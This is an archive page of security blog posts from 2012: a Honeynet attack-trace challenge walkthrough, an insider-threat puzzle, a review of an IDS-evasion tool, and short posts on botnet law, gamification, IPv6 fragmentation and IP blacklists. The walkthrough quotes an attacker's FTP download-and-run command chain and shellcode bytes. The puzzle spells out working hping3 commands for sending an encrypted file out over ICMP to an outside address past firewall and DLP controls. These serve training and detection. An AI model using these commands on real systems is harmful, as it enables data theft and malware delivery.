Author Archives: Luis Rocha

Nov 22 2012
Leave a comment
Intrusion Analysis

Attack Trace – Honeynet challenges – Part 1

[This one is going to be really hands-on with bits and bytes. Hopefully, will allow you to reinforce and learn new skills about tshark and other tools. Optimistically, you can use this skills on your day to day job when doing Intrusion Detection and Analysis. I learned quite some stuff. If you are willing to devote some extra neurons and practice your intrusion detection and analysis skills, go for it. I runned the analysis on a backtrack linux distro.]

Honeynet is a security research organization, non-profit, dedicated to investigating attacks. This organization has been around for more than one decade. The cool stuff is that they provide Challenges to give you the opportunity to analyze these attacks, practice your skills, learn new tools and share your findings. Honeynet claim that these attacks are from real hacks which makes it even more fun.

On 18 Jan. 2010 Honeynet Project released a challenge called “pcap attack trace” with the goal to investigate a network attack. This is the one I will focus today. The packet capture can be found here. Of course the solutions and write ups are available so don’t spoil yourself too much. The question 8 for me was the most difficult and still need to learn more about the topic.

1. Which systems (i.e. IP addresses) are involved?
Powerful tshark tool to run in quite mode (-q) and print the hosts tree statistics (-z ip_hosts,tree) from the pcap file will give you the IP addresses involved.
$tshark -r attack-trace.pcap -q -z ip_hosts,tree

2. What can you find out about the attacking host (e.g., where is it located)?
Other than using whois you can also use tshark with “-R” to apply visualization filters like you do in wireshark. Plus the “-T fields” wich allows to display only the contents of the selected field in this case “smb.native_os” which exists under SMB protocol and specifies the OS. Then pipe the contents of it into “uniq”
$tshark -r attack-trace.pcap -R ‘ip.src==98.114.205.102’ -T fields -e smb.native_os | uniq -c

3. How many TCP sessions are contained in the dump file?
Print the statistics about TCP conversations from pcap. which show 5 TCP sessions.
$tshark -r attack-trace.pcap -q -z conv,tcp -nn

4. How long did it take to perform the attack?
Tshark with “-t” will print the elapsed value in seconds. The last packet will show how long it took. Aprox. 16s
$tshark -r attack-trace.pcap -t r | tail -n 1

5. Which operating system was targeted by the attack? And which service? Which vulnerability?
Troughout the analysis you can see that OS is Windows XP, Service is Microsoft DS and Vulnerability is MS04-11.

7. What specific vulnerability was attacked?
Analyze the pcap file with Snort using default configuration file and log the output in full mode. This will give you good details about it.
$ sudo snort -r attack-trace.pcap -c /etc/snort/snort.conf -l /tmp/ -A full
$ cat /tmp/alert

[**] [1:2514:7] NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
04/19-22:28:30.172468 98.114.205.102:1828 -> 192.150.11.111:445
TCP TTL:113 TOS:0x0 ID:15421 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x8CFFA9C Ack: 0x5BD511D9 Win: 0xF7D6 TcpLen: 20
[Xref => http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx%5D%5BXref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0533%5D%5BXref => http://www.securityfocus.com/bid/10108%5D

8. What actions does the shellcode perform? Pls list the shellcode.
This is the difficult one. I must admit it goes beyond my current skills and will need more time to learn. I needed some help and used the exisiting writeups for guidance. Basically, if you look closer to the capture, especially the stream 1, some of the packets look suspicious due the NOP slides (0x90) throughout the packets. This instructions are common in buffer overflow exploits and others. The “-x” prints the hex and ASCII, the “-V” its for verbose output.
$tshark -r attack-trace.pcap -R ‘tcp.stream == 1’ –x
$tshark -r attack-trace.pcap -R ‘frame.number==29’ –xV
(..)
00c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0150 90 90 eb 10 5a 4a 33 c9 66 b9 7d 01 80 34 0a 99 ….ZJ3.f.}..4..
(..)

Ok, so we want to extract just the interesting data from frame 29 which represents the shellcode.
$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e tcp.data
(..) 90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90 (..)

Now we can try to get more information about. For example pipe the extract of “tcp.data” from frame 29 into “sed” to substitute the “:” with “\x”. Then will be in a format readable by the disasembler ndisasm. The ndisasm will disassemble the binary in 32bit fashion. On the output you can see that the shellcode starts with xor instruction and trough out the list you find that the shellcode is encoded using XOR.

$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e tcp.data | sed ‘s/:/\\x/g’ | ndisasm -b 32 –
(..)
00000000 3030 xor [eax],dh
00000002 5C pop esp
00000003 7830 js 0x35
00000005 305C7830 xor [eax+edi*2+0x30],bl
00000009 635C7866 arpl [eax+edi*2+0x66],bx
0000000D 345C xor al,0x5c
(..)

To decode XOR you can do similar extract but now pipe the tcp.data into “xxd”. xxd with “-r -p” will allow to reverse hex into binary using postscript output.
$tshark -r attack-trace.pcap_ -R ‘frame.number==29’ -T fields -e tcp.data | xxd -r -p | xxd
(..)
0000110: 9090 9090 9090 9090 9090 9090 eb10 5a4a …………..ZJ
0000120: 33c9 66b9 7d01 8034 0a99 e2fa eb05 e8eb 3.f.}..4……..
0000130: ffff ff70 9598 9999 c3fd 38a9 9999 9912 …p……8…..
(..)

Finally if you pipe the contents of the binary into the disasembler you will have the shellcode instructions. But now decoded. This was how far I could go with time limitations.
$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e tcp.data | xxd -r -p | ndisasm -b 32 –

(..)
0000011C EB10 jmp short 0x12e
0000011E 5A pop edx
0000011F 4A dec edx
00000120 33C9 xor ecx,ecx
00000122 66B97D01 mov cx,0x17d
00000126 80340A99 xor byte [edx+ecx],0x99
(..)

9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?
If you use passive fingerprinting analysis into the pcap it will tell you that the victim is running Linux, however it has a microsoft vulnerability. We can assume that its a honeypot.

$ sudo p0f -s attack-trace.pcap  ‘src 192.150.11.111’
p0f – passive os fingerprinting utility, version 2.0.8
(C) M. Zalewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com>
p0f: listening (SYN) on ‘attack-trace.pcap_’, 262 sigs (14 generic, cksum 0F1F5CA2), rule: ‘src 192.150.11.111’.
192.150.11.111:36296 – Linux 2.6 (newer, 3) (up: 11265 hrs)
-> 98.114.205.102:8884 (distance 0, link: ethernet/modem)
[+] End of input file.

10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge).
There is extra file downloaded using FTP after the compromise of the system. You can see on stream 2 and 3 details about it.

$tshark -r attack-trace.pcap -R ‘tcp.stream==2’ -T fields -e data.text

echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe\x0d\x0a
ssms.exe\x0d\x0a

$ tshark -r attack-trace.pcap -R ‘tcp.stream==3’ -T fields -e data.text

220 NzmxFtpd 0wns j0\x0a
USER 1\x0d\x0a
331 Password required\x0a
PASS 1\x0d\x0a
230 User logged in.\x0a
SYST\x0d\x0a
215 NzmxFtpd\x0a
TYPE I\x0d\x0a
200 Type set to I.\x0a
PORT 192,150,11,111,4,56\x0d\x0a
200 PORT command successful.\x0a
RETR ssms.exe\x0d\x0a
150 Opening BINARY mode data connection\x0a
QUIT\x0d\x0a
226 Transfer complete.\x0a
221 Goodbye happy r00ting.\x0a

Other than that, on stream4 there is a Windows executable that is easily identified by its file signature (magic number) wich contains “MZ” string. There are a variety of tools to extract and do carving of pcap files. I used “foremost”  to extract it.

$ foremost -i attack-trace.pcap
Processing: attack-trace.pcap
|*|

$ ls output/exe/
00000021.exe
$ file output/exe/00000021.exe
output/exe/00000021.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Finally you can download Clamav (Sourcefile opensource AV) into your system and scan the executable file.

$ sudo apt-get install clamav clamac-freshclam
$clamscan output/exe/00000021.exe
00000021.exe: Trojan.SdBot-9861 FOUND.

Tagged ,
Nov 19 2012
2 Comments
Incident Handling and Hacker Techniques

Countermeasures against Botnets – Legal aspects

The NATO Cooperative Cyber Defense Centre of Excellence based in Tallinn, Estonia just released a study about the legal implications of passive and active countermeasures against botnets. This investigation is made in collaboration with European Network and Information Security Agency (ENISA). It covers the legal aspects of fighting against botnets taking into account the German and Estonian law.  The study was created by two legal experts, one attorney, two scientists and a post-graduate civil service trainee. It’s very well written and it uses an interdisciplinary language which makes it accessible to people who aren’t specialist in information technology or legal.

It covers a variety of interesting topics such as assuming a system is compromised by a botnet. One of the steps, as part of the incident handling process, is that you might capture and inspect the traffic in order to detect and analyze the botnet traffic. However, from a legal perspective the study presents a variety of legal concerns regarding this. Some of them are personal data protection, unauthorized surveillance and confidentiality of communications. It means such monitoring might be perceived as breach of criminal law.  Even if some of the laws were not written in light of cyber space it still can apply.

Another topic with very unique characteristics and legal concerns is running a honeypot to collect, store and process data to learn about botnets. What are the legal concerns about sharing the data gained from running the honeypot? Or how it can be challenging for a private researcher to prove that the data he is collecting is for scientific interests.  These and other legal concerns are discussed in the study.

How about the takeover of botnets? Which assumes you successful infiltrated the CnC server. If the Botnet is taken over with the intent to eliminate and prevent crime and not prepare one, it still has implications under criminal law. Given the uncertainty of jurisdictional traits on how to handle such situations there is the risk of someone making him susceptible to prosecution. Other topics include: Takedown of Command and Control Servers, Automated Immunization or Disinfection, Botnet Mitigation Techniques under Exceptional Circumstances, Duty to Act against Botnet Attacks and Liability of Owners of Infected Hosts.

Apart of that, through out the study there are excellent reference’s that provide supporting and corroborating evidence of their assertions. Definitely a must read for security professionals involved in incident handling and others.

Tagged , ,
Nov 17 2012
1 Comment
Incident Handling and Hacker Techniques

Insider Threat – Dee Cypher

On my previous post I wrote about gamification and how it can be used to learn security skills. Let’s further illustrate this with a challenge that represents the risks of insider threats. Exfiltrating data using covert channels. A typical case of espionage:

Justin Case, a high-priced lawyer and an operative for V.I.L.E. found that ACME is working on a new high-profile deal. Justin Case wants to get the hands on that information to sell it to the competitors. He just contacted another operational from V.I.L.E. Dee Cypher who has insider access to ACME. His mission is to smuggle confidential information bypassing the high end security controls in place like Firewalls and Data Lost Prevention. During a secret venue they shared some information: The ACME is running the latest version of Checkpoint Firewall with rigid rules however it allows ping requests to me made with a maximum ping size protection of 1400 bytes. Also to bypass DLP inspection they agreed that the information should be sent encrypted using symmetric encryption AES 256 bits with a shared secret that they agreed upon.

How can Dee Crypt and Justin Case accomplish this mission?

DeeCypher$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
DeeCypher$ openssl enc -e -aes-256-cbc -in SecretPlans.pdf -out SecretPlans.enc
DeeCypher$ ls –lrta
-rw-r–r– 1 DeeCypher DeeCypher 30800 2012-11-17 15:49 SecretPlans.enc
DeeCypher$ echo ‘scale=2;30800/1400’ | bc –q
DeeCypher$ sudo hping3 -E SecretPlans.enc -1 -u -d 1400 220.132.33.16 -c 22

JustinCase$ sudo tcpdump -nni eth0 -s0 proto 1 -w receiving.pcap
JustinCase$ tshark -r receiving.pcap -R ‘icmp.type==8’ -w data.pcap
JustinCase$ tshark -r data.pcap -T fields -e data | xxd -r -p > SecretPlans.enc
JustinCase$ openssl enc -d -aes-256-cbc -in SecretPlans.enc -out SecretPlans.pdf
JustinCase$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
JustinCase$ acroread SecretPlans.pdf

Lets describe the commands of Dee Cypher. First, the md5 of SecretPlans.pdf was produced, which can then be used to verify the file integrity. Next, the file SecretPlans.pdf was encrypted using AES-256-CBC algorithm resulting into SecretPlans.enc. Then, SecretPlans.enc was checked and it contains 30800 bytes. Now he wanted to know how many ICMP packets he will need to send the contents of the file using a payload of 1400 bytes. To do this he used the precision calculator bc in quiet mode. Divided the total amount of the file size by the size of the payload. The result was formatted to show two digits after the decimal point, it’s 22. It means, he will need to send 22 packets to send the whole contents of the file. To forge the ICMP packets hping3 was used. It’s specified the filename that will fill packet data, the traffic type using icmp mode with a data size of 1400 and a total of 22 packets.

On the other end, JustinCase executed tcpdump to capture ICMP traffic with no limit on the captured packet size. He extracted the traffic, using tshark, that matched wireshark filter ICMP Echo Request (type 8) and wrote it into data.pcap. Then, extracted the data portion of the ICMP payload. The output of this command was piped into xxd to convert the data into binary using plain hexdump style. The file was decrypted using the same algorithm and finally integrity was checked and the file was opened with acrobat reader.

Note: On this example a Checkpoint R75 with IPS and DLP blade enable was used. The IPS had configured a Max Ping Size of 1400 bytes.  By default the IPS does not have the Max Ping Size protection enable and the default value is 2500 bytes. Further, the ICMP traffic is not covered by DLP inspection which means the data could be sent in clear text instead of encrypted.

After having fun and eventually engage people to challenge this with other possibilities and tools let’s think about it. This example demonstrates that insider threat should be a serious concern by today organizations. In this case Intellectual property or confidential information could be stolen. Understanding how susceptible you are to insider threat is a valuable step in order to develop controls to detect, remediate and mitigate. Access to information outside of need to know, unauthorized encryption of information, unauthorized information transfer are examples of technical actions and indicators that could be used in this case as observables for a possible detection.

In 2006, the CERT coordination center which is located at Carnegie Mellon University released a technical report “Comparing Insider IT Sabotage and Espionage: A model-based analysis‘. This study considered not only the technical factors that contribute to Espionage and Sabotage cases but also the psychological, organizational and contextual factors. It’s definitely a good read for security professionals and leaders with responsibility on the organization security posture. Other than that the CERT Insider Threat Centers provides comprehensive and detailed information about this topic.

Tagged , , ,
Nov 13 2012
Leave a comment
Gamification

Gamification

NetWars logo used with permission from SANSUser engagement, return on investment and learning. Those are key benefits of gamification. Gamification might be a new term but it has been used on specific industries since years. One example is the militaries that have been using games, challenges and simulations to resolve problems and engage audiences.  NATO is considering gamification using the Internet. The Office of Naval Research a department from the US Navy recently ran a Massive Multiplayer Online Wargame Leveraging the Internet. Deloitte call it the engagement economy.

Gabe Zichermann and Christopher Cunningham on the preface of their latest book wrote that “Simulation and gaming is a promising, and rapidly-expanding, field of study. This new methodology is being adopted in a wide variety of disciplines. Complicated computer models have helped inform everything from finance to engineering, a new wave of “serious games” have begun to change the way we think about gaming as a told for learning, and true-to-life simulations have changed the way professionals train for intensive, on the job-skills.”

Then, how can we use and apply gamification to information security? Well, learning information security skills through gamification is what this post is about. And is where NetWars comes in. NetWars is a product from SANS and it illustrates how gamification can be used to help you increasing your information security skills. The concept is not new and there are others. Similar is the Overthewire and Smasthestack challenges, which are also known as capture the flag or wargames. However, NetWars was made by Ed Skoudis. That alone is already a differentiator. Last year at London, SANS hosted the first EMEA Netwars tournament session. It consisted of 5 levels, where each one consists of several challenges that will give you points from 1 to 15 based on its difficulty. To be able to pass to the next level you need to reach a certain threshold. The levels are designed to help participants develop skills areas such as Vulnerability Assessments, System Hardening, Malware Analysis, Digital Forensics, Incident Response, Packet Analysis and Penetration Testing.

Should business leaders invest in this type of simulations to train their employees? Absolutely, the marriage between pedagogy and technology is a fact. In addition from a pure return on investment, employee training might be the best business expense.  According to Professor Bartel, who is the Director of Columbia Business School’s Workforce Transformation Initiative and an expert in the field of labor economics and human resource management. The estimated return on employee training range from 7% to 50% per dollar spent and on two specific case studies it can grow with returns of 100% to 200% on investment. Further details on her paper “Measuring Employer Return on Investments in Training”.

To give you an example on how gamification can be used to engage people and learn. You might remember, back in 90s, there was a famous video game called Where in the World is Carmen Sandiego?. The game challenges player to track the thief who is hiding out in one of 30 cities using a world almanac as investigative tool (for example, “What country uses keroner as its currency?  Check your connections to find out which cities the thief might have fled to). The game basically teaches you knowledge of world geography and cultures.

But back to NetWars and his director, Ed Skoudis, check his presentation on “Using InfoSec Challenges to build your skills and career”. Among others the presentation describes the benefits of gamification information security challenges. The presentation also provides guidelines on how to develop your own challenges and simulations.

Teaching and training systems like NetWars are designed to mimic real life situations. In this case it represents real-world security issues with their respective flaws and resolutions on an  interactive and hands-on laboratory environment. Historically books contain theories and examples. But with simulations, challenges and games, the dynamic and a temporal element can be added. It will also allow difficult concepts to be vibrantly illustrated.

References:
Zichermann, Gabe; Cunningham, Christopher (2011) : Gamification by Design : O’Reilly
Information Resources Management Associations (2011) :Gaming and Simulations : IGI Global

Tagged , , , , , ,
Nov 12 2012
Leave a comment
Intrusion Analysis

Evader

Evader is a tool produced by Stonesoft which provides a ready-made test lab to test IP evasion techniques. Stonesoft claims that this tool should be used to test your network security solutions effectiveness against the protection and detection of threats. Other than marketing and hype, Stonesoft as always provided innovative solutions in the network security market. You might remember the old days of Stonebeat Full cluster software that was used by vendors like Checkpoint to create high availability and load sharing scenarios.

The evader tool has the ability to test IP evasion techniques against two vulnerabilities: CVE-2004-1315 and CVE-2008-4250. For the first one, the tool has available 24 evasion methods which 9 are at application layer, 2 at network layer and 13 at the transport layer. The test lab cover CVE-2004-1315 and it can be easily downloaded and deployed using VMware. The documentation is clear and provides step-by-step guidance.

Essentially, the virtual machine contains an installed Linux, Apache, MySQL, Php and as deployed the PHP Bulletin Board version 2.0.10. This application is vulnerable to CVE-2004-1315. The Santy worm back in 2004 used this vulnerability to abuse and deface websites.

In the tested version of evader the available evasion technques are:

http_header_lws – HTTP header linear whitespace
http_known_user_agent – HTTP known user agent
http_request_line_separator – HTTP request line separator
http_request_method – HTTP request method
http_request_pipelined – HTTP request pipelined
http_url_absolute – HTTP URL absolute
http_url_dummypath – HTTP dummy paths
http_url_encoding – HTTP URL encoding
http_version – HTTP request version
ipv4_frag – IPv4 fragmentation
ipv4_opt – IPv4 options
tcp_chaff – TCP Chaff
tcp_initialseq – TCP initial sequence number
tcp_inittsopt – TCP timestamp option settings
tcp_nocwnd – Disable TCP congestion avoidance
tcp_nofastretrans – Disable TCP fast retransmit
tcp_order – TCP segment order
tcp_overlap – TCP segment overlap
tcp_paws – TCP PAWS elimination
tcp_recv_window – TCP receive window
tcp_seg – TCP segmentation
tcp_timewait – TCP TIME-WAIT decoys
tcp_tsoptreply – TCP timestamp echo reply modifications
tcp_urgent – TCP urgent data

I decided to take a deeper look and downloaded the evader version 0.9.8.557. After that created a small lab to test the tool against the Checkpoint product with Firewall and IPS blade enable. Mainly, I created an account on Checkpoint User Center and requested a trial license of 15 days and downloaded the ISO image of Checkpoint R75.40 with software blades. Installed the system as Security Gateway and Security Management Server. Configured IP addressing, rules and routing to suit test scenario. The lab setup wouldn’t take long if you are familiar with Vmware and Checkpoint.

Interesting is that, either default or recommended IPS profile from Checkpoint R75.40 does not catch the attack used against CVE-2004-1315. I used evader and metasploit. Looking deeper at signatures from Checkpoint Web Intelligence – Malicious codes – General HTTP worm catchers, the signature that eventually should catch this attack is called Sanity.A Worm. However, the regular expression available for this attack needs to be adjusted.  After that the attack is successful detected and/or prevented. From the moment that the security solution detects  the attack we can start using the evasion techniques to test its effectiveness. In this case, after having the signature configured properly on the Checkpoint IPS the evasion techniques I tried (time limitation was a factor) were all detected/prevented. With an overall protection score of 98.3% on the NSS labs report that would be the expected result.

Understanding threats, identify their causes and implement effective countermeasures takes time but will help you reducing risk and exposure. With this I mean that its generally worth doing your assessment and use this kind of tools against the security products that protect you assets to have a better understanding of the technical advantages and drawbacks. Security companies want to make you think you are as secure as possible and that eventually provides you a false sense of security.

If you are interested in intrusion analysis and/or configuring IDS/IPS systems. If you would like to have a peek behind the scenes on how the packets look like when crafted with  evasion techniques such as fragmentation attacks or obfuscation. Then evader is definitely a good start. The tool illustrates quite well a significant amount of attack vectors. You can use it to complement frameworks like Metasploit to learn or reinforce skills about evasion techniques.

[2017-02-10]: The Evader tool is no longer available but I kept a copy here: Evader, for the ones that are interested in playing with it.

In addition to this write up, the following references will give all you need to acquire more knowledge about Intrusion Detection Evasion:

Insertion Evasion and Denial of Service Eluding Network Intrusion Detection
Ptacek & Newsham, 1998

The Base-Rate Fallacy and its Implications for the Difficulty of Intrusion Detection
Stefan Axelsson, 1999

A Strict Anomoly Detection Model for IDS
sasha / beetle, 2000

Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol Semantics
Handley & Paxton, 2001

IDS Evasion Techniques and Tactics
Kevin Timm, 2002

Combining Evasion Techniques to Avoid Network Intrusion Detection Systems
Gorton & Champion, 2003

Intrusion Detection System (IDS) Evasion
VeriSign, 2006

Thermoptic Camouflage: Total IDS Evasion
Caswell & Moore, 2006

Metasploitation
HD Moore, CanSecWest 2006

How to test an IPS
Renaud Bidou,2006

Networks Environment Detection of DDoS and IDS Evasion Attacks in a High-Speed
Oh, Park Jang & Jeon, 2007

Advanced Evasion Techniques: New Methods and Combinatorics for Bypassing Intrusion Prevention Technologies
Boltz Jalava & Walsh, 2010

Active Mapping : Resisting NIDS Evasion without Altering Traffic
Umesh Shankar, Vern Paxson

Intrusion Detection FAQ: How does Fragroute evade NIDS detection?
Michael Holstein

Tagged , , , ,
Nov 09 2012
Leave a comment
Intrusion Analysis

Overlapping IPv6 Fragments

Antonios Atlasis is an independed IT security analyst who just recently joined the Centre for Strategic Cyberspace + Security Science non-profit organization. This year he released a paper called “Attacking IPv6 Implementation Using Fragmentation“. If you are interested in the security issues that arise from IP packets fragmentation then you should read it. It describes how it can be used by attackers to elude intrusion detection systems. It also includes PoC produced with Scapy tool. Eventually, one of the results of this research is the fresh CVE-2012-4444.

Worth to note is that IETF released a standard RFC number 5722 about this topic back in December 2009. On this RFC, Suresh Krishnan from the IPv6 working group, clearly states that IPv6 specification should prevent overlapping fragments. We should clearly see adoption of this RFC by the security industry in the future.

Attacks via IP packet fragmentation are not new and they were very well documented in January 1998 by Thomas Ptacek and Timothy Newsham on the landmark paper on this topic called “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”. Based on this paper Dug Song released a tool called fragrouter and later fragroute which implemented the techniques described in that paper. But that’s a different story and It’s my intention to write more about this topic in a near future because it’s still being discussed today.

Tagged , ,
Nov 07 2012
Leave a comment
Security Monitoring

Start with 334

Effective and reliable security monitoring that produces actionable information is one of the toolset’s that can help us adjust to today’s complex threat landscape. One of the existing mechanisms under security monitoring is the use of real time blacklists (RBLs). These blacklists keep track of IP addresses that are considered malicious or offensive and will help people and organizations keeping track of IP addresses that they own. For example, you can monitor and potentially detect if your public IP address space is being blacklisted ; or one of your systems has been compromised and is communicating with a blacklisted IP (e.g. sending intellectual property overseas or receiving command and control commands with malevolent instructions).

The information available is mainly public and is a contribution of well-known individuals – like Roman Hussy from Abuse.ch or Steven Adair from Shadowserver Foundation –  to the security community. I have reasons to believe that when combining information from reliable and trustworthy blacklist data source with the defense mechanisms in place – traditionally blacklists are used at perimeter due to the volume of data – we have a straight forward method which will accurately identify signs of dangerous, reduce our exposure to today threats and provides actionable intelligence.

From the available data sources of blacklist, three of them worth to remark (description taken from their respective websites):

Abuse.ch is one of the best public resources that you can use to track botnet command and control domains and IP addresses. At the moment is contains three trackers:

  1. Zeus tracker is a list of all ZeuS C&Cs as well as Fake URLs which are currently known to the ZeuS Tracker. You can browse the ZeuS Tracker to get a list of ZeuS C&Cs and FakeURLs in a specified Country or AS number. Additionally the ZeuS Tracker provides a feature which allows to filter the ZeuS C&Cs for specified Nameservers, Level, Status and many more.
  2. SpyEye Tracker is another project by abuse.ch. It is similar to the ZeuS Tracker with the slight difference that SpyEye Tracker tracks and monitors malicious SpyEye Command&Control Servers (and not ZeuS C&Cs). SpyEye Tracker provides blocklists in different formats (eg. for Squid Web-Proxy or iptables) to avoid that infected clients can access the C&C servers. Additionally, SpyEye Tracker should help ISPs, CERTs and Law Enforcement to track malicious SpyEye C&C servers which are their responsibility
  3. Palevo tracker is a list of Palevo infections. Palevo is a worm that spreads using instant messaging, P2P networks and removable drives (like USB sticks). It is being sold in underground forums like ZeuS. The worm (also known as Rimecud, Butterfly bot and Pilleuz) made big press in 2010 (see Trend Micro: “Clipping Mariposa’s Wings” / Symantec: “Symantec: The Mariposa Butterfly“).

Shadowserver Foundation is an all volunteer watchdog group of security professionals that gather, track, and report on malware, botnet activity, and electronic fraud. It is the mission of the Shadowserver Foundation to improve the security of the Internet by raising awareness of the presence of compromised servers, malicious attackers, and the spread of malware. You might have heard about them on their collaborationw with Microsoft on taking down the Waledac botnet.

Emerging Threats is an open source community for collecting Suricata and Snort rules, firewall rules, and other IDS rulesets. The open source community still plays an active role in Internet security, with more than 200,000 active users downloading the ruleset daily.

Other than those three, the following picture illustrates a compilation of data sources of blacklisted IPs with the amount of addresses they provide and the respective site to download the blacklist. Most of them are free for private use.

Block Lists

All these lists contain a sum of 16749 IPs (type = address) from which 95.4 % are unique. The amount of IPs for Shadowserver is not mentioned because their monitoring service works based on the information that is provide to them by you about the ASN or CIDR ranges that you own.

Besides that, you can search through these block lists to get valuable information, which at the same time it can be time consuming. Nonetheless, online services like the Anti-Abuse Project automatically checks IP addresses and domains against 60 Real-time blacklists and would give you actionable information. For example if the IP address is listed in more than 10 block listed is positively malicious.

Well, after all this text, the name of this blog entry is 334 due to the fact that at the moment of writing this is the number of IP addresses that you should certainly monitor. This 334 IP addresses are the sum of the IP addresses on the lists provided by : Zeus, Spyeye and Palevo tracker from Abuse repository (+) RBN (Russian Business Network) Frequent Malware Advertisers from Emerging Threats repository.

If you use any of these blacklist, you should updated them at reasonable intervals. These blacklists will definitely help you creating a list of prohibited events and build procedures for remediating them. Use them as you see fit.

Tagged , ,
Older posts
Newer posts